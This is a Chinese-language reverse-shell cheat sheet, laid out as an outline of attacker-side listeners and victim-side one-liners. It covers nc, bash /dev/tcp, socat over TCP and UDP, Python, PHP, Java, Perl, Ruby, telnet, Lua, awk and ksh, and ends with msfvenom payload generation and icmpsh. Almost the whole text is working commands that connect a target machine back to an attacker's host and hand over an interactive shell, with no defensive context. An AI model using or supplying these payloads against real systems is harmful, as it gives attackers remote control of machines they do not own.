跨边界传输之反弹shell

反弹shell
     1.nc
         正向连接
             攻击机
                 nc-vv 受害者ip 受害者port
             受害者
                 nc-lvvp受害者port - e /bin/bash
         反向连接
             攻击机
                 nc -lvvp 攻击机port
             受害者
                 nc -vv攻击机ip 攻击机port -e /bin/bash
         聊天/传文件
             发送方
                 nc -lvvp 自己的port <文件
             接收方
                 nc -vv发送方ip 发送方port > 文件
     2.bash
         接收端(hackip,公网)
             nc -lvvp 端口
         发送端(受害者）
             bash -i >& /dev/tcp/hackip/hack端口 0>&1
             0<&31-;exec 31<>/dev/tcp/hackip/hack端口;sh <&31 >&31 2>&31
     3.socat
         tcp反弹
             接收端(攻击机)
                 socat TCP-LISTEN:端口 -
             发送端(靶机)
                 linux
                     socat exec:’bash -i’,pty,stderr,setsid,sigint,sane tcp:攻击机ip:攻击机端口
                 windows
                     socat.exe exec:’cmd.exe’,pty,stderr,setsid,sigint,sane tcp:攻击机ip:攻击机端口
         udp反弹
             接收端(攻击机)
                 socat udp-listen:端口 -
                 发送端(靶机)
                     linux
                         socat udp-connect:ip:port exec:’bash -i’,pty,stderr,sane 2>&1>/dev/null &
                     windows
                         socat.exe udp-connect:192.168.5.108:30000 exec:’cmd.exe’,pty,stderr,sane
     4.python
         接收端(攻击机)
             nc -lvvp port
         发送端(靶机)
             python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“接收端ip”,接收端端口));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
     5.php反弹
         接收端(攻击机)
             nc -lvvp port
         发送端(靶机)
             php -r ‘$sock=fsockopen(“接收端ip”,接收端端口);exec(“/bin/sh -i <&3 >&3 2>&3”);’
     6.JAVA反弹
         接收端(攻击机)
             nc -lvvp port
         发送端(靶机)
             r = Runtime.getRuntime() p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/192.168.31.41/8080;cat <&5 | while read line; do $line 2>&5 >&5; done”] as String[]) p.waitFor()
     7.perl反弹
         接收端(攻击机)
             nc -lvvp port
         发送端(靶机)
             perl -e ‘use Socket;$i=”ip”;$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
     8.ruby反弹
         接收端(攻击机)
             nc -lvvp port
         发送端(靶机)
             ruby -r socket -e ‘exit if fork;c=TCPSocket.new(“ip”,”port”);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’
     9.telnet反弹
         接收端(攻击机)
             nc -lvvp port
         发送端(靶机)
             mknod backpipe p && telnet ip port 0<backpipe | /bin/bash 1>backpipe
     10.lua反弹
         接收端(攻击机)
             nc -lvvp port
         发送端(靶机)
             lua -e “local s=require(‘socket’);local t=assert(s.tcp());t:connect(‘ip’,port);while true do local r,x=t:receive();local f=assert(io.popen(r,’r’));local b=assert(f:read(‘*a’));t:send(b);end;f:close();t:close();”
     11.awk
         接收端(攻击机)
             nc -lvvp port
         发送端(靶机)
             awk ‘BEGIN{s=”/inet/tcp/0/ip/port”;while(1){do{s|&getline c;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!=”exit”);close(s)}}’
     12.ksh/tsh/zsh/sh
         接收端(攻击机)
             nc -lvvp port
         发送端(靶机)
             ksh -c ‘ksh >/dev/tcp/ip/port 2>&1 <&1’
     13.通过msfvenom生成反弹shell的payload
         1.msfvenom -l payloads | grep 工具
         2.msfvenom -p payload LHOST=监听机IP LPORT=监听端口
     14.icmpsh
         接收端
             ./icmpsh-m.py
         发送端
             icpmsh.exe -t 接收端ip